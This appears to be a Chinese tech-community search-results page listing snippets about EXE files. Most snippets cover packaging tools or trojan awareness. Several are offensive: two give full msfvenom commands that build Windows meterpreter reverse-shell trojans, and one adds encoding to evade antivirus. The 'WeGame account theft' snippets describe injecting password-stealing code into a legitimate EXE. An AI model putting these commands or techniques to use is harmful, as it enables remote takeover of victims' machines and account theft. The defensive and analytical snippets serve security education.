- 综合排序
- 最热优先
- 最新优先
- 来自专栏2024年网络安全宣传周
网络安全宣传周 - EXE 文件携带木马
然而,一些不法分子利用用户对娱乐的需求,将木马程序隐藏在看似正常的小游戏 EXE 文件中,给用户的电脑安全带来了严重威胁。 二、EXE 文件携带木马的隐藏方式(一)代码混淆通过对木马代码进行混淆处理,使其难以被常规的安全检测工具识别和分析。(二)加壳技术使用加壳工具对木马程序进行封装,改变其特征码,逃避杀毒软件的查杀。 三、木马植入机制(一)自动运行在 EXE 文件被执行时,木马程序自动启动并尝试获取系统的管理员权限。(二)修改系统设置更改注册表、系统服务等设置,确保木马在系统启动时能够自动加载。 (二)物联网风险随着物联网设备的普及,EXE 文件携带的木马可能会扩展到智能设备领域,带来新的安全挑战。 (三)社交工程利用攻击者可能会更加巧妙地利用社交工程手段,诱使用户下载和运行携带木马的 EXE 文件。十、结论EXE 文件携带木马是一种严重的网络安全威胁,给个人和社会带来了巨大的风险和损失。
61210编辑于 2024-08-17 aipy实战:建设PE文件查杀神器,阻止Windows EXE木马!
一、 核心功能(1)扫恶意字符串(如 keylogger、powershell)(2)查熵值异常(判断是否加密 / 加壳)(3)揪可疑 API 组合(像注册表篡改、网络通信链)(4)解析 PE 头(看编译环境 、系统兼容性、加壳痕迹)二、过程实战测了个可疑文件,刚用工具跑了 nimplant.exe,结果吓一跳:提示词:帮我写一个小型的木马静态特征查杀工具,用于检测windows下的exe可执行文件是否是可疑的木马 最后,测试我的exe程序:"D:\Tools\aipy20250411\aipy\nimplant.exe"。检测这个文件是不是恶意的木马。把写好的软件保存在项目文件夹下。 对于程序动态连接函数,Aipy 也能仔细排查出结果啦:扫出 426 个可疑字符串,含键盘记录、勒索关键词熵值超高(.rdata 节区 6.94),明显加密痕迹检测到注册表篡改 + 网络通信 API 组合,妥妥的木马行为结论 三、优势轻量:Python 脚本直接跑,不挑环境✨灵活:特征库可自定义,适合二次开发实用:样本初筛、应急响应都能用这次打造的PE文件查杀工具初战告捷,成功识别出恶意木马的多种特征,堪称静态分析的“小钢炮
30310编辑于 2025-05-23exe4j实践教程
欢迎关注微信公众号:数据科学与艺术 作者WX:superhe199 问题## exe4j下载和使用(超详细) 1、下载exe4j 1.1、安装步骤就不说了,按照提示一步一步进行即可 2、这里使用的jar 包是maven项目打包出来的jar 2.1、打开exe4j 2.2、 下一步 2.4、下一步 2.5、下一步 2.6、下一步 2.7、一直点击下一步到第(10)
21010编辑于 2025-08-29- 来自专栏全栈程序员必看
Python打包exe文件方法汇总【4种】
目录对python代码打包成exe的方式有4种,py2exe,pyinstaller,cx_Freeze,nuitka,分别对以上4种方法介绍,欢迎纠错和提供新的办法。 py2exe 介绍 py2exe是一个将python脚本转换成windows上的可独立执行的可执行程序(*.exe)的工具,这样,你就可以不用装python而在windows系统上运行这个可执行程序。 优点: 可以把python打包成exe 缺点: 打包好的 exe只能在相同的系统下运行,比如你在XP系统用py2exe打包好的exe只能在XP上运行,在win7上肯定有问题,而且也是存在在别的XP机子上也可能不能运行 ,因为一些别的机子可能会缺少dll文件什么的,作者我当时之所以抛弃py2exe 也是因为这个原因; 打包的文件也需要打包同exe下的dll,和一些库的压缩包,不然exe根本跑不起来 打包时候报始终报 py2exe使用方法 (含一些调试技巧,如压缩email 类) pyinstaller PyInstaller除了win32平台外还支持Linux,Unix平台.py2exe的用法在前面的博文里已经有了
4.2K10编辑于 2022-08-11 kali使用msf生成exe木马常用最简一条龙命令
multi/handlersetpayloadwindows/meterpreter/reverse_tcpsetLHOST192.168.186.46setLPORT4444exploit✅第一步:生成木马程序 展开代码语言:BashAI代码解释msfvenom-pwindows/meterpreter/reverse_tcpLHOST=192.168.186.46LPORT=4444-fexe-oiarc.exe 载荷LHOST=192.168.186.46攻击者的IP(即你Kali或监听机器的IP)LPORT=4444攻击者监听的端口(反向连接目标会连回这个端口)-fexe输出格式为Windows可执行文件(.exe )-oiarc.exe输出文件名为iarc.exe总结:这条命令会生成一个Windows木马程序iarc.exe,一旦在目标Windows机器上运行,它会主动连接回192.168.186.46:4444 ✅第五步:设置监听IP和端口展开代码语言:BashAI代码解释setLHOST192.168.186.46setLPORT4444这两行必须和生成木马时用的LHOST和LPORT完全一致,否则无法建立连接
1.5K20编辑于 2025-11-14- 来自专栏IT大咖说
咋多了一个svchost.exe进程?小心!你可能中了Bazar后门木马
据美国科技媒体BleepingComputer报道,一场新的网络钓鱼活动正在试图借助一种名为“BazarBackdoor”的新型后门木马来获取目标企业网络的完全访问权限。 图4.“客户投诉”主题诱饵文档 尽管下载的文件采用了Word、Excel或PDF的图标,但实际上它们全是可执行文件。 例如,“新型冠状病毒”主题诱饵文档对应的文件名为“PreviewReport.DOC.exe”,“客户投诉”主题诱饵文档对应的文件名为“Preview.PDF.exe”。 图6.C2通信 但是,第二个C2请求将下载XOR加密的有效载荷,即BazarBackdoor后门木马。 ? 图8.将后门注入svchost.exe 由于Windows任务管理中时刻都运行着大量的svchost.exe进程,因此大多数用户都不太可能会注意到什么时候多出了一个这样的进程,进而也就不会注意到后门的存在
3K20发布于 2020-05-19 - 来自专栏重生信息安全
0x4 Python教程:Python到EXE
onefile <scriptName> 这将处理python脚本,提取必要的导入依赖项,并生成一个包含<scriptName> .txt,<scriptName> .spec和<scriptName> .exe 现在可以使用<scriptName> .exe,并且可以删除.txt和.spec。
1.4K10发布于 2020-04-26 - 来自专栏全栈程序员必看
exe4j的使用_使用方法
exe4j的使用 在这里选择exe 填写你的exe名字和存放路径 对软件的设置 如果电脑是64位需要勾上 防止软件乱码 -Dfile.encoding=UTF-8 导入jar包 jdk版本
1.4K30编辑于 2022-09-20 - 来自专栏csdn
使用 exe4j 将 Spring Boot 项目打包为 EXE 可执行文件
使用 exe4j 将 Spring Boot 项目打包为 EXE 可执行文件 什么是 exe4j Exe4j 是一款用于将 Java 应用程序打包为 Windows 平台上可执行文件(.exe)的工具。 无论是服务器端、GUI 程序还是命令行应用,都可以通过 exe4j 生成独立的 EXE 文件。此外,exe4j 还可以: 替代默认的 java.exe,以自定义进程名出现在任务管理器中。 下载和安装 Exe4j: 下载地址:https://www.ej-technologies.com/products/exe4j/download.html。 打包 Spring Boot 项目为 EXE 文件 以下是通过 exe4j 打包的完整步骤: 1.启动 exe4j 打开 exe4j,进入欢迎界面后,点击 Next。 2. 兼容性问题: Exe4j 仅支持 JDK 1.8 至 11,请确保 JDK 版本在此范围内。
2.9K10编辑于 2024-11-29 - 来自专栏太阳影的学习记录
UE4报错cmd.exe failed with args c
看上面的What went wrong就已经可以看出来出了什么问题了,我这里就是指定的JDK目录错误,安装JDK11之后重新制定目录就可以了。
1.6K10发布于 2021-10-15 - 来自专栏AI算法与图像处理
windows 10编译YOLOv4,包括exe和d
windows darknet 下载后是一个exe文件,打开傻瓜式一步步安装就好了,记录好安装路径(我这里是D:\Tools\OpenCV\opencv),然后增加一个环境变量OpenCV_DIR,指向 windows darknet 编译darknet.exe 下载cmake,地址是:https://cmake.org/download/,也是傻瓜式的安装。然后打开cmake-gui.exe ? windows darknet 最后我们来测试一下,将Debug\darknet.exe和3rdparty\pthreads\bin下的pthreadGC2.dll和pthreadVC2.dll都拷贝到 darknet源码根目录下,除此以外,还要准备权重文件yolov4.weights 然后执行图片测试命令 . \darknet.exe detect cfg\yolov4.cfg yolov4.weights data\dog.jpg ?
1.8K30发布于 2021-04-21 - 来自专栏全栈程序员必看
trojangeneric木马_kali木马绑定app
Kworker 木马,如果发现root 权限计划任务有以下这种非常规任务,说明已经中招成了矿机 Dt 环境,大家要注意,切莫随便给开放端口。
2K40编辑于 2022-11-08 - 来自专栏Eric杂货铺
pyinstaller.exe带logo打包exe
可以在Windows、Mac OS X和Linux上使用,但是并不是跨平台的,而是说你要是希望打包成.exe文件,需要在Windows系统上运行PyInstaller进行打包工作;打包成mac app,
1.9K30发布于 2020-09-24 - 来自专栏用户10781703的专栏
浅谈木马
Windows木马 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.520.520 lport=4444 -f exe -o muma.exe -p windows/meterpreter/reverse_tcp -e x86/shikata_ganai -i 30 -b ’\x00’ lhost=hackIP lport=4444 -f exe -o muma.exe -e 编码的方式 -i 编码次数 -b不使用十六进制00 一些其他的编码方式,可以使用msfvenom -l encoders命令查看 四、木马防护 1.木马的传播途径 (1 )利用下载进行传播 (2)利用系统漏洞传播 (3)利用邮件传播 (4)利用即使通信传播 (5)利用网页传播 (6)利用蠕虫病毒传播等 2.木马的防范与查杀 (1)首先安装杀毒软件 (2)不执行奇怪的软件 ,使用的软件尽量从官方下载安装 (3)不随便打开奇怪的邮件 (4)尽量少使用或者不使用共享文件夹 (5)不点击奇怪的链接等 本文只是简单讨论下木马远控,为了提高自己和身边亲友的安全意识,后期会有对木马的深入探讨
1.6K20编辑于 2023-10-10 - 来自专栏FreeBuf
Kronos银行木马被发现,疑似新版Osiris木马
根据Proofpoint安全研究人员的说法,新版本的Kronos银行木马正蠢蠢欲动,研究人员证实,最近三次宣传这个旧木马的翻新版本在2014年经历了鼎盛时期。 根据昨天晚上发布报告显示,今年4月,研究人员已经发现了这种新型Kronos变种的第一批样本。 Kronos 2018版可能是新版Osiris木马 研究人员说,与此同时,这种新的Kronos变种开始出现在他们的雷达上,一名恶意软件作者开始在黑客论坛上宣传一种新的银行木马,他称之为Osiris。 最大的线索是这个新特洛伊木马的作者声称他的木马只有350 KB大小,接近于早期Kronos 2018版样本——研究人员4月份发现的(351 KB)大小。 该样本被命名为os.exe,大概来自Osiris,巧合与否,目前没有得到证实。 ? *参考来源:bleepingcomputer,由抗生素1209编译,转载请注明来自FreeBuf.COM
1.6K50发布于 2018-07-31 - 来自专栏全栈程序员必看
instsrv.exe srvany.exe启动服务
ConsulClient\Parameters"; ///
/// 通过注册表注册Consul Agent服务 /// /// <param name="consulPath">exe 所在文件夹</param> /// <param name="consulExeLocal">consul.exe,exe物理路径</param> private static void ConsulClientRegEdit = null) root.DeleteSubKeyTree(subkey); } } 2.instsrv.exe srvany.exe启动服务 string consulExeLocal = DefautToolsRelyHelper.Consul + "\\consul.exe"; string srvanyPath = DefautToolsRelyHelper.Srvany + @"\srvany\srvany.exe"; string instsrvPath = DefautToolsRelyHelper.Srvany + @"\srvany\instsrv.exe"; CheckRelyTools(consulExeLocal, srvanyPath,1.1K20编辑于 2022-09-01 - 来自专栏白安全组
挖矿木马详解
门罗币的算法通过计算机CPU和GPU即可进行运算,不需要其他特定的硬件支持; 4. 互联网上开源的门罗币挖矿项目很多,方便使用; 5. 暗网支持门罗币交易。 为什么会中挖矿木马? 定位挖矿 普通开源挖矿程序 如果感觉主机突然出现明显的卡顿,可以打开任务管理器,查看CPU使用率,中了挖矿木马时,用任务管理器可能会看到存在奇怪的进程,CPU占用率较高,比如下图中,LogonUI.exe ,ProtectionX挖矿木马就是其中一种,除了自保护和自启动外,还会释放安装驱动文件,木马运行流程如图: 母体运行后会将自身设置为隐藏属性,并释放win1logon.exe、wuauc1t.exe 、ProcessExtended.dll,并且释放一个快捷方式用于带参数启动wuauc1t.exe: 同时会在temp目录下释放随机字符命名的驱动文件,并通过注册成服务hy5.5,对应的注册表键值如下 : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\hy5.5 并为母体1sass.exe添加注册表自启动: HKEY_LOCAL_MACHINE
13.5K61发布于 2019-12-02 - 来自专栏黑客技术家园
木马盗号《一》
这一节主要给大家分享的是黑客是如何利用木马进行盗号的。 久前看了一些安全方面的书籍。在看完了《计算机病毒揭秘与对抗》---王倍昌书 以后,打算找个目标试试手。 由于本次只是木马主要功能原理介绍,所以我并不介绍木马怎么隐藏、怎么绕过360防御(本文木马很容易被杀毒软件查杀)进行免杀。(-。-/主要我还没看。O(∩_∩)O)。 其次隐蔽性较好,他是直接在目标关键EXE注入代码,可以理解为病毒代码就是EXE的一部分。不需要另外加载DLL或者开启服务,那样目标比较大。 现在已经选好了方式:把病毒代码写入到目标EXE,然后每次运行目标EXE就会运行我们的恶意代码。下面介绍我们应该通过怎么样方式去捕获WeGame的账号和密码。 难道要让本菜IDA逆向分析整个关键EXE文件找漏洞,显然不太适合我-。-,一方面技术不行,另一方面没那么多时间。。。。那么怎么破解这个密码框捕获到的密码不对的问题呢?
1.9K30发布于 2021-04-02 - 来自专栏全栈程序员必看
Python使用py2exe打包exe程序
py2exe可以将Python程序打包成exe程序,使得可以在没有Python环境的机器上运行。 # 为了打包成exe运行的时候能够看清楚,不会一闪而过 sleep(10) 下载py2exe: pip install py2exe 编写setup.py 文件: from distutils.core import setup import py2exe INCLUDES = ['hello_test'] options = { "py2exe 'hello_test.py'}] # 生成一个控制台形式的exe程序,对应的有windows=[],生成GUI形式的exe程序 ) 具体的参数在代码注释里面已描写,更多参数含义可自行搜索 然后使用python命令生成: python setup.py py2exe 然后在项目根目录会生成dist文件夹,里面就有刚打包好的exe程序: 双击启动: 版权声明
6.6K21编辑于 2022-11-04 - 来自专栏黑客技术家园
木马盗号《三》
背景: 上一篇 WeGame盗号木马之旅(二) 我们实现了键盘按键模拟驱动的开发,这篇我们实现下具体注入代码的编写。 目标: 具体的注入代码编写。实现账号获取和密码获取。 这一篇我们写的注入代码就是上面橙色框内的代码,后面我们会写InfectiveVirus.exe的代码,用于实现怎么把这次实现的代码写到目标EXE,并且让他像正常工作一样,但是关键时刻会向服务器发送信息。 我们的注入代码可以当作就像是原本就运行在目标EXE里面的代码一样。 最后通过一个char数组保存二进制到InfectiveVirus.exe。然后直接memcpy复制二进制到目标EXE即可。如图是我写好的二进制代码char 数组: ? 相加就是0X00570000,我的数据是加到原来EXE尾部的。下面的TASLogin.exe 也是同理。 TASLogin.exe PE结构图: ?
2K20发布于 2021-04-02
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号